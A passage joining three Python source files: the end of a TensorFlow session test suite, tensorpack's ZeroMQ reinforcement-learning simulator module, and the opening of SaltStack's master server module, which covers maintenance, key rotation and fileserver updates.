6.0, 6.0]], e_val) v_val = v.eval() self.assertAllEqual([[4.0, 4.0, 4.0]], v_val) s.run(assign_e_to_v) v_val = v.eval() self.assertAllEqual([[6.0, 6.0, 6.0]], v_val) self.assertEqual(ops.get_default_graph(), s.graph) def testDefaultGraphWithThreads(self): # Fork ten threads that use their thread-local default graph. threads = [] constructed_events = [threading.Event() for _ in range(10)] continue_event = threading.Event() for i, constructed_event in enumerate(constructed_events): t = self.checkedThread(target=self._testDefaultGraphInThread, args=(constructed_event, continue_event, i)) threads.append(t) for t in threads: t.start() for constructed_event in constructed_events: constructed_event.wait() continue_event.set() for t in threads: t.join() def testParallelRun(self): with session.Session() as sess: c = constant_op.constant(5.0) ev = threading.Event() def run_step(): ev.wait() val = c.eval(session=sess) self.assertEqual(val, 5.0) threads = [self.checkedThread(target=run_step) for _ in range(100)] for t in threads: t.start() ev.set() for t in threads: t.join() def testRunFeedDict(self): with session.Session() as s: x = array_ops.zeros([2]) y = s.run(2 * x, feed_dict={x: np.ones(2).astype(np.float32)}) self.assertAllEqual(y, 2 * np.ones(2)) y = s.run(2 * x, feed_dict={x.name: np.ones(2).astype(np.float32)}) self.assertAllEqual(y, 2 * np.ones(2)) y = s.run(2 * x, feed_dict={x: [1, 1]}) assert (y == 2 * np.ones(2)).all() def testGraphDef(self): with session.Session() as sess: self.assertProtoEquals( 'versions { producer: %d min_consumer: %d }' % ( versions.GRAPH_DEF_VERSION, versions.GRAPH_DEF_VERSION_MIN_CONSUMER), sess.graph_def) c = constant_op.constant(5.0, name='c') self.assertEquals(len(sess.graph_def.node), 1) d = constant_op.constant(6.0, name='d') self.assertEquals(len(sess.graph_def.node), 2) self.assertAllEqual(c.eval(), 5.0) self.assertAllEqual(d.eval(), 6.0) e = constant_op.constant(7.0, name='e') self.assertEquals(len(sess.graph_def.node), 3) self.assertAllEqual(e.eval(), 7.0) def testUseAfterClose(self): with session.Session() as sess: c = constant_op.constant(5.0) self.assertAllEqual(sess.run(c), 5.0) with self.assertRaisesWithPredicateMatch( RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)): sess.run(c) def testUseAfterCloseConcurrent(self): with session.Session() as sess: c = constant_op.constant(5.0) self.assertAllEqual(sess.run(c), 5.0) def update_thread(): with self.assertRaisesWithPredicateMatch( RuntimeError, lambda e: 'Attempted to use a closed Session.' in str(e)): while True: sess.run(c) t = threading.Thread(target=update_thread) t.start() time.sleep(0.1) sess.close() t.join() def testUseEmptyGraph(self): with session.Session() as sess: with self.assertRaisesWithPredicateMatch( RuntimeError, lambda e: 'The Session graph is empty.' in str(e)): sess.run([]) def testNotEntered(self): # pylint: disable=protected-access self.assertEqual(ops._default_session_stack.get_default(), None) # pylint: enable=protected-access with ops.device('/cpu:0'): sess = session.Session() c_1 = constant_op.constant(5.0) with sess.graph.as_default(): c_2 = constant_op.constant(5.0) self.assertEqual(c_1.graph, c_2.graph) self.assertEqual(sess.run(c_2), 5.0) with self.assertRaisesWithPredicateMatch( ValueError, lambda e: 'No default session is registered.' in str(e)): c_2.eval() def testInteractive(self): with ops.device('/cpu:0'): sess = session.InteractiveSession() a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) self.assertAllEqual([[4.0, 4.0, 4.0]], c.eval()) d = constant_op.constant([1.0, 2.0, 3.0], shape=[3, 1]) e = math_ops.matmul(c, d) self.assertAllEqual([[24.0]], e.eval()) sess.close() def testSharedGraph(self): with ops.Graph().as_default() as g, ops.device('/cpu:0'): a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[2, 3]) c = math_ops.matmul(a, b) with session.Session(graph=g) as sess1: with session.Session(graph=g) as sess2: self.assertAllEqual(sess1.run(c), sess2.run(c)) def testDuplicatedInputs(self): with session.Session() as sess: a = constant_op.constant(1.0, shape=[1, 2]) b = constant_op.constant(2.0, shape=[1, 3]) a_val, b_val, a2_val = sess.run([a, b, a]) self.assertAllEqual(a_val, [[1.0, 1.0]]) self.assertAllEqual(b_val, [[2.0, 2.0, 2.0]]) self.assertAllEqual(a2_val, [[1.0, 1.0]]) def testFeedAndFetch(self): with session.Session(): for dtype in [dtypes.float16, dtypes.float32, dtypes.float64, dtypes.int32, dtypes.uint8, dtypes.int16, dtypes.int8, dtypes.int64, dtypes.bool, dtypes.complex64, dtypes.complex128]: for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: np_dtype = dtype.as_numpy_dtype feed_t = array_ops.placeholder(dtype=dtype, shape=shape) out_t = array_ops.identity(feed_t) np_array = np.random.randint(-10, 10, shape) if dtype == dtypes.bool: np_array = np_array > 0 elif dtype == dtypes.complex64: np_array = np.sqrt(np_array.astype(np_dtype)) elif dtype == dtypes.complex64: np_array = np.sqrt(np_array.astype(np_dtype)) else: np_array = np_array.astype(np_dtype) self.assertAllEqual(np_array, out_t.eval(feed_dict={feed_t: np_array})) def testFeedError(self): with session.Session() as sess: feed_t = array_ops.placeholder(dtype=dtypes.float32) out_t = array_ops.identity(feed_t) feed_val = constant_op.constant(5.0) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): sess.run(out_t, feed_dict={feed_t: feed_val}) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): out_t.eval(feed_dict={feed_t: feed_val}) with self.assertRaisesRegexp(TypeError, 'cannot be a tf.Tensor object'): out_t.op.run(feed_dict={feed_t: feed_val}) def testStringFetch(self): with session.Session(): for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: size = 1 for s in shape: size *= s c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)], dtype=np.object).reshape(shape) if size > 0 else [] c = constant_op.constant(c_list) self.assertAllEqual(c.eval(), c_list) def testStringFeed(self): with session.Session(): for shape in [(32, 4, 128), (37,), (2, 0, 6), (0, 0, 0)]: size = 1 for s in shape: size *= s c_list = np.array([compat.as_bytes(str(i)) for i in xrange(size)], dtype=np.object).reshape(shape) feed_t = array_ops.placeholder(dtype=dtypes.string, shape=shape) c = array_ops.identity(feed_t) self.assertAllEqual(c.eval(feed_dict={feed_t: c_list}), c_list) def testStringFeedWithNullCharacters(self): with session.Session(): c_list = [b'\n\x01\x00', b'\n\x00\x01'] feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2]) c = array_ops.identity(feed_t) out = c.eval(feed_dict={feed_t: c_list}) self.assertEqual(c_list[0], out[0]) self.assertEqual(c_list[1], out[1]) def testStringFeedWithUnicode(self): with session.Session(): c_list = [u'\n\x01\x00', u'\n\x00\x01'] feed_t = array_ops.placeholder(dtype=dtypes.string, shape=[2]) c = array_ops.identity(feed_t) out = c.eval(feed_dict={feed_t: c_list}) self.assertEqual(c_list[0], out[0].decode('utf-8')) self.assertEqual(c_list[1], out[1].decode('utf-8')) out = c.eval(feed_dict={feed_t: np.array(c_list, dtype=np.object)}) self.assertEqual(c_list[0], out[0].decode('utf-8')) self.assertEqual(c_list[1], out[1].decode('utf-8')) def testInvalidTargetFails(self): with self.assertRaisesRegexp( RuntimeError, 'No session factory registered for the given session options.'): session.Session('INVALID_TARGET') def testFetchByNameDifferentStringTypes(self): with session.Session() as sess: c = constant_op.constant(42.0, name='c') d = constant_op.constant(43.0, name=u'd') e = constant_op.constant(44.0, name=b'e') f = constant_op.constant(45.0, name=r'f') self.assertTrue(isinstance(c.name, six.text_type)) self.assertTrue(isinstance(d.name, six.text_type)) self.assertTrue(isinstance(e.name, six.text_type)) self.assertTrue(isinstance(f.name, six.text_type)) self.assertEqual(42.0, sess.run('c:0')) self.assertEqual(42.0, sess.run(u'c:0')) self.assertEqual(42.0, sess.run(b'c:0')) self.assertEqual(42.0, sess.run(r'c:0')) self.assertEqual(43.0, sess.run('d:0')) self.assertEqual(43.0, sess.run(u'd:0')) self.assertEqual(43.0, sess.run(b'd:0')) self.assertEqual(43.0, sess.run(r'd:0')) self.assertEqual(44.0, sess.run('e:0')) self.assertEqual(44.0, sess.run(u'e:0')) self.assertEqual(44.0, sess.run(b'e:0')) self.assertEqual(44.0, sess.run(r'e:0')) self.assertEqual(45.0, sess.run('f:0')) self.assertEqual(45.0, sess.run(u'f:0')) self.assertEqual(45.0, sess.run(b'f:0')) self.assertEqual(45.0, sess.run(r'f:0')) def testIncorrectGraph(self): with ops.Graph().as_default() as g_1: c_1 = constant_op.constant(1.0, name='c') with ops.Graph().as_default() as g_2: c_2 = constant_op.constant(2.0, name='c') self.assertEqual('c', c_1.op.name) self.assertEqual('c', c_2.op.name) with session.Session(graph=g_1) as sess_1: self.assertEqual(1.0, sess_1.run(c_1)) with self.assertRaises(ValueError): sess_1.run(c_2) with self.assertRaises(ValueError): sess_1.run(c_2.op) with session.Session(graph=g_2) as sess_2: with self.assertRaises(ValueError): sess_2.run(c_1) with self.assertRaises(ValueError): sess_2.run(c_1.op) self.assertEqual(2.0, sess_2.run(c_2)) def testPartialRun(self): with session.Session() as sess: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) c = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) r2 = math_ops.mul(r1, c) h = sess.partial_run_setup([r1, r2], [a, b, c]) res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2}) self.assertEqual(3, res) temp = res * 17 res = sess.partial_run(h, r2, feed_dict={c: temp}) self.assertEqual(153, res) # Call again on the same graph. h2 = sess.partial_run_setup([r1, r2], [a, b, c]) res = sess.partial_run(h2, r1, feed_dict={a: 1, b: 2}) self.assertEqual(3, res) temp = res * 18 res = sess.partial_run(h2, r2, feed_dict={c: temp}) self.assertEqual(162, res) def testPartialRunIncomplete(self): with session.Session() as sess: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) c = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) r2 = math_ops.mul(r1, c) h = sess.partial_run_setup([r1, r2], [a, b, c]) res = sess.partial_run(h, r1, feed_dict={a: 1, b: 2}) self.assertEqual(3, res) def testConcurrentPartialRun(self): with session.Session() as sess: a = array_ops.placeholder(dtypes.float32, shape=[]) b = array_ops.placeholder(dtypes.float32, shape=[]) c = array_ops.placeholder(dtypes.float32, shape=[]) r1 = math_ops.add(a, b) r2 = math_ops.mul(r1, c) h1 = sess.partial_run_setup([r1], [a, b, c]) h2 = sess.partial_run_setup([r1, r2], [a, b, c]) res = sess.partial_run(h1, r1, feed_dict={a: 1, b: 2}) self.assertEqual(3, res) temp = res * 19 res = sess.partial_run(h2, r1, feed_dict={a: temp, b: 9}) self.assertEqual(66, res) res = sess.partial_run(h2, r2, feed_dict={c: 7}) self.assertEqual(462, res) def testManyPartialRun(self): with session.Session() as sess: steps = 200 inputs = [] outputs = [] a = constant_op.constant(2.0, dtypes.float32) for i in xrange(steps): inputs.append(array_ops.placeholder(dtypes.float32, shape=[])) a = math_ops.mul(a, inputs[i]) outputs.append(a) h = sess.partial_run_setup(outputs, inputs) for i in xrange(steps): res = sess.partial_run(h, outputs[i], feed_dict={inputs[i]: 1.0}) self.assertEqual(2.0, res) feed_dict = {} for i in xrange(steps): feed_dict[inputs[i]] = 1.0 res = sess.run(outputs, feed_dict) self.assertEqual(steps, len(res)) self.assertEqual(2.0, res[-1]) def testFeedDictKeyException(self): with session.Session() as sess: a = constant_op.constant(1.0, dtypes.float32, name='a') with self.assertRaisesRegexp(TypeError, "Cannot interpret feed_dict"): sess.run(a, feed_dict={'a': [2.0]}) def testPerStepTrace(self): run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() with ops.device('/cpu:0'): with session.Session() as sess: sess.run(constant_op.constant(1.0)) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), run_metadata=run_metadata) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), options=run_options, run_metadata=run_metadata) self.assertTrue(run_metadata.HasField('step_stats')) self.assertEquals(len(run_metadata.step_stats.dev_stats), 1) def testRunOptionsRunMetadata(self): run_options = config_pb2.RunOptions( trace_level=config_pb2.RunOptions.FULL_TRACE) run_metadata = config_pb2.RunMetadata() with ops.device('/cpu:0'): with session.Session() as sess: # all combinations are valid sess.run(constant_op.constant(1.0), options=None, run_metadata=None) sess.run(constant_op.constant(1.0), options=None, run_metadata=run_metadata) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), options=run_options, run_metadata=None) self.assertTrue(not run_metadata.HasField('step_stats')) sess.run(constant_op.constant(1.0), options=run_options, run_metadata=run_metadata) self.assertTrue(run_metadata.HasField('step_stats')) self.assertEquals(len(run_metadata.step_stats.dev_stats), 1) def testFeedShapeCompatibility(self): with session.Session() as sess: some_tensor = constant_op.constant([2.0, 2.0, 2.0, 2.0]) new_shape = constant_op.constant([2, 2]) reshaped_tensor = array_ops.reshape(some_tensor, new_shape) with self.assertRaisesRegexp(ValueError, 'Cannot feed value of shape'): sess.run(reshaped_tensor, feed_dict={some_tensor: [1.0, 2.0, 3.0]}) with self.assertRaisesRegexp(ValueError, 'may not be fed'): sess.run(reshaped_tensor, feed_dict={new_shape: [3, 7]}) def testRunWithNoTargetsIsAnError(self): with session.Session() as sess: _ = constant_op.constant(5.0) with self.assertRaisesRegexp( errors.InvalidArgumentError, 'Must specify at least one target to fetch or execute.'): sess.run([]) if __name__ == '__main__': googletest.main()
simulator.py
#!/usr/bin/env python2 # -*- coding: utf-8 -*- # File: simulator.py # Author: Yuxin Wu <ppwwyyxxc@gmail.com> import sys import os import signal import time import tensorflow as tf import multiprocessing as mp import time import threading import weakref from abc import abstractmethod, ABCMeta from collections import defaultdict, namedtuple import numpy as np import six from six.moves import queue from ..models._common import disable_layer_logging from ..callbacks import Callback from ..tfutils.varmanip import SessionUpdate from ..predict import OfflinePredictor from ..utils import logger from ..utils.timer import * from ..utils.serialize import * from ..utils.concurrency import * __all__ = ['SimulatorProcess', 'SimulatorMaster', 'SimulatorProcessStateExchange', 'SimulatorProcessSharedWeight', 'TransitionExperience', 'WeightSync'] try: import zmq except ImportError: logger.warn("Error in 'import zmq'. RL simulator won't be available.") __all__ = [] class TransitionExperience(object): """ A transition of state, or experience""" def __init__(self, state, action, reward, **kwargs): """ kwargs: whatever other attribute you want to save""" self.state = state self.action = action self.reward = reward for k, v in six.iteritems(kwargs): setattr(self, k, v) class SimulatorProcessBase(mp.Process): __metaclass__ = ABCMeta def __init__(self, idx): super(SimulatorProcessBase, self).__init__() self.idx = int(idx) self.identity = u'simulator-{}'.format(self.idx).encode('utf-8') @abstractmethod def _build_player(self): pass class SimulatorProcessStateExchange(SimulatorProcessBase): """ A process that simulates a player and communicates to master to send states and receive the next action """ __metaclass__ = ABCMeta def __init__(self, idx, pipe_c2s, pipe_s2c): """ :param idx: idx of this process """ super(SimulatorProcessStateExchange, self).__init__(idx) self.c2s = pipe_c2s self.s2c = pipe_s2c def run(self): player = self._build_player() context = zmq.Context() c2s_socket = context.socket(zmq.PUSH) c2s_socket.setsockopt(zmq.IDENTITY, self.identity) c2s_socket.set_hwm(2) c2s_socket.connect(self.c2s) s2c_socket = context.socket(zmq.DEALER) s2c_socket.setsockopt(zmq.IDENTITY, self.identity) #s2c_socket.set_hwm(5) s2c_socket.connect(self.s2c) state = player.current_state() reward, isOver = 0, False ts = 0 while True: c2s_socket.send(dumps( (self.identity, state, reward, isOver, ts, True)), copy=False) #t.grel here we get the action (action, ts, isAlive) = loads(s2c_socket.recv(copy=False).bytes) if not isAlive: c2s_socket.send(dumps( (self.identity, 0, 0, 0, 0, False)), copy=False) print("closing thread : {}".format(self.identity)) break reward, isOver = player.action(action) state = player.current_state() # compatibility SimulatorProcess = SimulatorProcessStateExchange class SimulatorMaster(threading.Thread): """ A base thread to communicate with all StateExchangeSimulatorProcess. It should produce action for each simulator, as well as defining callbacks when a transition or an episode is finished. """ __metaclass__ = ABCMeta class ClientState(object): def __init__(self): self.memory = [] # list of Experience def __init__(self, pipe_c2s, pipe_s2c, simulator_procs, pid): super(SimulatorMaster, self).__init__() self.daemon = True self.context = zmq.Context() self.c2s_socket = self.context.socket(zmq.PULL) self.c2s_socket.bind(pipe_c2s) self.c2s_socket.set_hwm(10) self.s2c_socket = self.context.socket(zmq.ROUTER) self.s2c_socket.bind(pipe_s2c) self.s2c_socket.set_hwm(10) # queueing messages to client self.send_queue = queue.Queue(maxsize=1) self.simulator_procs = simulator_procs self.killed_threads = 0 self.pid = pid def f(): msg = self.send_queue.get() self.s2c_socket.send_multipart(msg, copy=False) self.send_thread = LoopThread(f) self.send_thread.daemon = True self.send_thread.start() # make sure socket get closed at the end def clean_context(soks, context): for s in soks: s.close() context.term() import atexit atexit.register(clean_context, [self.c2s_socket, self.s2c_socket], self.context) def run(self): self.clients = defaultdict(self.ClientState) while True: bytes = self.c2s_socket.recv(copy=False).bytes msg = loads(bytes) ident, state, reward, isOver, ts, isAlive = msg client = self.clients[ident] if not isAlive: self.killed_threads += 1 print("killed : {}, waiting for {}".format(self.killed_threads, self.simulator_procs)) if self.killed_threads == self.simulator_procs: self.M.isDone = True break continue # check if reward&isOver is valid # in the first message, only state is valid if len(client.memory) > 0: client.memory[-1].reward = reward if isOver: self._on_episode_over((ident, ts)) else: self._on_datapoint((ident, ts)) # feed state and return action self._on_state(state, (ident, ts)) print("MasterSimulator is out, peace") time.sleep(10) os.kill(self.pid, signal.SIGKILL) @abstractmethod def _on_state(self, state, ident): """response to state sent by ident. Preferrably an async call""" @abstractmethod def _on_episode_over(self, client): """ callback when the client just finished an episode. You may want to clear the client's memory in this callback. """ def _on_datapoint(self, client): """ callback when the client just finished a transition """ def __del__(self): self.context.destroy(linger=0) class SimulatorProcessDF(SimulatorProcessBase): """ A simulator which contains a forward model itself, allowing it to produce data points directly """ def __init__(self, idx, pipe_c2s): super(SimulatorProcessDF, self).__init__(idx) self.pipe_c2s = pipe_c2s def run(self): self.player = self._build_player() self.ctx = zmq.Context() self.c2s_socket = self.ctx.socket(zmq.PUSH) self.c2s_socket.setsockopt(zmq.IDENTITY, self.identity) self.c2s_socket.set_hwm(5) self.c2s_socket.connect(self.pipe_c2s) self._prepare() for dp in self.get_data(): self.c2s_socket.send(dumps(dp), copy=False) @abstractmethod def _prepare(self): pass @abstractmethod def get_data(self): pass class SimulatorProcessSharedWeight(SimulatorProcessDF): """ A simulator process with an extra thread waiting for event, and take shared weight from shm. Start me under some CUDA_VISIBLE_DEVICES set! """ def __init__(self, idx, pipe_c2s, condvar, shared_dic, pred_config): super(SimulatorProcessSharedWeight, self).__init__(idx, pipe_c2s) self.condvar = condvar self.shared_dic = shared_dic self.pred_config = pred_config def _prepare(self): disable_layer_logging() self.predictor = OfflinePredictor(self.pred_config) with self.predictor.graph.as_default(): vars_to_update = self._params_to_update() self.sess_updater = SessionUpdate( self.predictor.session, vars_to_update) # TODO setup callback for explore? self.predictor.graph.finalize() self.weight_lock = threading.Lock() # start a thread to wait for notification def func(): self.condvar.acquire() while True: self.condvar.wait() self._trigger_evt() self.evt_th = threading.Thread(target=func) self.evt_th.daemon = True self.evt_th.start() def _trigger_evt(self): with self.weight_lock: self.sess_updater.update(self.shared_dic['params']) logger.info("Updated.") def _params_to_update(self): # can be overwritten to update more params return tf.trainable_variables() class WeightSync(Callback): """ Sync weight from main process to shared_dic and notify""" def __init__(self, condvar, shared_dic): self.condvar = condvar self.shared_dic = shared_dic def _setup_graph(self): self.vars = self._params_to_update() def _params_to_update(self): # can be overwritten to update more params return tf.trainable_variables() def _before_train(self): self._sync() def _trigger_epoch(self): self._sync() def _sync(self): logger.info("Updating weights ...") dic = {v.name: v.eval() for v in self.vars} self.shared_dic['params'] = dic self.condvar.acquire() self.condvar.notify_all() self.condvar.release() if __name__ == '__main__': import random from tensorpack.RL import NaiveRLEnvironment class NaiveSimulator(SimulatorProcess): def _build_player(self): return NaiveRLEnvironment() class NaiveActioner(SimulatorActioner): def _get_action(self, state): time.sleep(1) return random.randint(1, 12) def _on_episode_over(self, client): #print("Over: ", client.memory) client.memory = [] client.state = 0 name = 'ipc://whatever' procs = [NaiveSimulator(k, name) for k in range(10)] [k.start() for k in procs] th = NaiveActioner(name) ensure_proc_terminate(procs) th.start() import time time.sleep(100)
master.py
# -*- coding: utf-8 -*- ''' This module contains all of the routines needed to set up a master server, this involves preparing the three listeners and the workers needed by the master. ''' # Import python libs from __future__ import absolute_import, with_statement, print_function, unicode_literals import copy import ctypes import os import re import sys import time import errno import signal import stat import logging import collections import multiprocessing import threading import salt.serializers.msgpack # pylint: disable=import-error,no-name-in-module,redefined-builtin from salt.ext import six from salt.ext.six.moves import range from salt.utils.zeromq import zmq, ZMQDefaultLoop, install_zmq, ZMQ_VERSION_INFO # pylint: enable=import-error,no-name-in-module,redefined-builtin import tornado.gen # pylint: disable=F0401 # Import salt libs import salt.crypt import salt.client import salt.client.ssh.client import salt.exceptions import salt.payload import salt.pillar import salt.state import salt.runner import salt.auth import salt.wheel import salt.minion import salt.key import salt.acl import salt.engines import salt.daemons.masterapi import salt.defaults.exitcodes import salt.transport.server import salt.log.setup import salt.utils.args import salt.utils.atomicfile import salt.utils.crypt import salt.utils.event import salt.utils.files import salt.utils.gitfs import salt.utils.gzip_util import salt.utils.jid import salt.utils.job import salt.utils.master import salt.utils.minions import salt.utils.platform import salt.utils.process import salt.utils.schedule import salt.utils.ssdp import salt.utils.stringutils import salt.utils.user import salt.utils.verify import salt.utils.zeromq from salt.config import DEFAULT_INTERVAL from salt.defaults import DEFAULT_TARGET_DELIM from salt.transport import iter_transport_opts from salt.utils.debug import ( enable_sigusr1_handler, enable_sigusr2_handler, inspect_stack ) from salt.utils.event import tagify from salt.utils.odict import OrderedDict try: import resource HAS_RESOURCE = True except ImportError: # resource is not available on windows HAS_RESOURCE = False # Import halite libs try: import halite # pylint: disable=import-error HAS_HALITE = True except ImportError: HAS_HALITE = False log = logging.getLogger(__name__) class SMaster(object): ''' Create a simple salt-master, this will generate the top-level master ''' secrets = {} # mapping of key -> {'secret': multiprocessing type, 'reload': FUNCTION} def __init__(self, opts): ''' Create a salt master server instance :param dict opts: The salt options dictionary ''' self.opts = opts self.master_key = salt.crypt.MasterKeys(self.opts) self.key = self.__prep_key() # We need __setstate__ and __getstate__ to also pickle 'SMaster.secrets'. # Otherwise, 'SMaster.secrets' won't be copied over to the spawned process # on Windows since spawning processes on Windows requires pickling. # These methods are only used when pickling so will not be used on # non-Windows platforms. def __setstate__(self, state): self.opts = state['opts'] self.master_key = state['master_key'] self.key = state['key'] SMaster.secrets = state['secrets'] def __getstate__(self): return {'opts': self.opts, 'master_key': self.master_key, 'key': self.key, 'secrets': SMaster.secrets} def __prep_key(self): ''' A key needs to be placed in the filesystem with permissions 0400 so clients are required to run as root. ''' return salt.daemons.masterapi.access_keys(self.opts) class Maintenance(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' A generalized maintenance process which performs maintenance routines. ''' def __init__(self, opts, **kwargs): ''' Create a maintenance instance :param dict opts: The salt options ''' super(Maintenance, self).__init__(**kwargs) self.opts = opts # How often do we perform the maintenance tasks self.loop_interval = int(self.opts['loop_interval']) # Track key rotation intervals self.rotate = int(time.time()) # A serializer for general maint operations self.serial = salt.payload.Serial(self.opts) # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self._is_child = True self.__init__( state['opts'], log_queue=state['log_queue'], log_queue_level=state['log_queue_level'], _opts=state['opts'] ) def __getstate__(self): return { 'opts': self.opts, 'log_queue': self.log_queue, 'log_queue_level': self.log_queue_level } def _post_fork_init(self): ''' Some things need to be init'd after the fork has completed The easiest example is that one of these module types creates a thread in the parent process, then once the fork happens you'll start getting errors like "WARNING: Mixing fork() and threads detected; memory leaked." ''' # Load Runners ropts = dict(self.opts) ropts['quiet'] = True runner_client = salt.runner.RunnerClient(ropts) # Load Returners self.returners = salt.loader.returners(self.opts, {}) # Init Scheduler self.schedule = salt.utils.schedule.Schedule(self.opts, runner_client.functions_dict(), returners=self.returners) self.ckminions = salt.utils.minions.CkMinions(self.opts) # Make Event bus for firing self.event = salt.utils.event.get_master_event(self.opts, self.opts['sock_dir'], listen=False) # Init any values needed by the git ext pillar self.git_pillar = salt.daemons.masterapi.init_git_pillar(self.opts) self.presence_events = False if self.opts.get('presence_events', False): tcp_only = True for transport, _ in iter_transport_opts(self.opts): if transport != 'tcp': tcp_only = False if not tcp_only: # For a TCP only transport, the presence events will be # handled in the transport code. self.presence_events = True def run(self): ''' This is the general passive maintenance process controller for the Salt master. This is where any data that needs to be cleanly maintained from the master is maintained. ''' salt.utils.process.appendproctitle(self.__class__.__name__) # init things that need to be done after the process is forked self._post_fork_init() # Make Start Times last = int(time.time()) old_present = set() while True: now = int(time.time()) if (now - last) >= self.loop_interval: salt.daemons.masterapi.clean_old_jobs(self.opts) salt.daemons.masterapi.clean_expired_tokens(self.opts) salt.daemons.masterapi.clean_pub_auth(self.opts) self.handle_git_pillar() self.handle_schedule() self.handle_key_cache() self.handle_presence(old_present) self.handle_key_rotate(now) salt.utils.verify.check_max_open_files(self.opts) last = now time.sleep(self.loop_interval) def handle_key_cache(self): ''' Evaluate accepted keys and create a msgpack file which contains a list ''' if self.opts['key_cache'] == 'sched': keys = [] #TODO DRY from CKMinions if self.opts['transport'] in ('zeromq', 'tcp'): acc = 'minions' else: acc = 'accepted' for fn_ in os.listdir(os.path.join(self.opts['pki_dir'], acc)): if not fn_.startswith('.') and os.path.isfile(os.path.join(self.opts['pki_dir'], acc, fn_)): keys.append(fn_) log.debug('Writing master key cache') # Write a temporary file securely if six.PY2: with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache')) as cache_file: self.serial.dump(keys, cache_file) else: with salt.utils.atomicfile.atomic_open(os.path.join(self.opts['pki_dir'], acc, '.key_cache'), mode='wb') as cache_file: self.serial.dump(keys, cache_file) def handle_key_rotate(self, now): ''' Rotate the AES key rotation ''' to_rotate = False dfn = os.path.join(self.opts['cachedir'], '.dfn') try: stats = os.stat(dfn) # Basic Windows permissions don't distinguish between # user/group/all. Check for read-only state instead. if salt.utils.platform.is_windows() and not os.access(dfn, os.W_OK): to_rotate = True # Cannot delete read-only files on Windows. os.chmod(dfn, stat.S_IRUSR | stat.S_IWUSR) elif stats.st_mode == 0o100400: to_rotate = True else: log.error('Found dropfile with incorrect permissions, ignoring...') os.remove(dfn) except os.error: pass if self.opts.get('publish_session'): if now - self.rotate >= self.opts['publish_session']: to_rotate = True if to_rotate: log.info('Rotating master AES key') for secret_key, secret_map in six.iteritems(SMaster.secrets): # should be unnecessary-- since no one else should be modifying with secret_map['secret'].get_lock(): secret_map['secret'].value = salt.utils.stringutils.to_bytes(secret_map['reload']()) self.event.fire_event({'rotate_{0}_key'.format(secret_key): True}, tag='key') self.rotate = now if self.opts.get('ping_on_rotate'): # Ping all minions to get them to pick up the new key log.debug('Pinging all connected minions ' 'due to key rotation') salt.utils.master.ping_all_connected_minions(self.opts) def handle_git_pillar(self): ''' Update git pillar ''' try: for pillar in self.git_pillar: pillar.fetch_remotes() except Exception as exc: log.error('Exception caught while updating git_pillar', exc_info=True) def handle_schedule(self): ''' Evaluate the scheduler ''' try: self.schedule.eval() # Check if scheduler requires lower loop interval than # the loop_interval setting if self.schedule.loop_interval < self.loop_interval: self.loop_interval = self.schedule.loop_interval except Exception as exc: log.error('Exception %s occurred in scheduled job', exc) def handle_presence(self, old_present): ''' Fire presence events if enabled ''' # On the first run it may need more time for the EventPublisher # to come up and be ready. Set the timeout to account for this. if self.presence_events and self.event.connect_pull(timeout=3): present = self.ckminions.connected_ids() new = present.difference(old_present) lost = old_present.difference(present) if new or lost: # Fire new minions present event data = {'new': list(new), 'lost': list(lost)} self.event.fire_event(data, tagify('change', 'presence')) data = {'present': list(present)} self.event.fire_event(data, tagify('present', 'presence')) old_present.clear() old_present.update(present) class FileserverUpdate(salt.utils.process.SignalHandlingMultiprocessingProcess): ''' A process from which to update any dynamic fileserver backends ''' def __init__(self, opts, **kwargs): super(FileserverUpdate, self).__init__(**kwargs) self.opts = opts self.update_threads = {} # Avoid circular import import salt.fileserver self.fileserver = salt.fileserver.Fileserver(self.opts) self.fill_buckets() # __setstate__ and __getstate__ are only used on Windows. # We do this so that __init__ will be invoked on Windows in the child # process so that a register_after_fork() equivalent will work on Windows. def __setstate__(self, state): self._is_child = True self.__init__( state['opts'], log_queue=state['log_queue'], _opts=state['opts'] ) def __getstate__(self): return {'opts': self.opts, 'log_queue': self.log_queue,} def fill_buckets(self): ''' Get the configured backends and the intervals for any backend which supports them, and set up the update "buckets". There will be one bucket for each thing being updated at a given interval. ''' update_intervals = self.fileserver.update_intervals() self.buckets = {} for backend in self.fileserver.backends(): fstr = '{0}.update'.format(backend) try: update_func = self.fileserver.servers[fstr] except KeyError: log.debug( 'No update function for the %s filserver backend', backend ) continue if backend in update_intervals: # Variable intervals are supported for this backend for id_, interval in six.iteritems(update_intervals[backend]): if not interval: # Don't allow an interval of 0 interval = DEFAULT_INTERVAL log.debug( 'An update_interval of 0 is not supported, ' 'falling back to %s', interval ) i_ptr = self.buckets.setdefault(interval, OrderedDict()) # Backend doesn't technically need to be present in the # key, all we *really* need is the function reference, but # having it there makes it easier to provide meaningful # debug logging in the update threads. i_ptr.setdefault((backend, update_func), []).append(id_) else: # Variable intervals are not supported for this backend, so # fall back to the global interval for that fileserver. Since # this backend doesn't support variable updates, we have # nothing to pass to the backend's update func, so we'll just # set the value to None. try: interval_key = 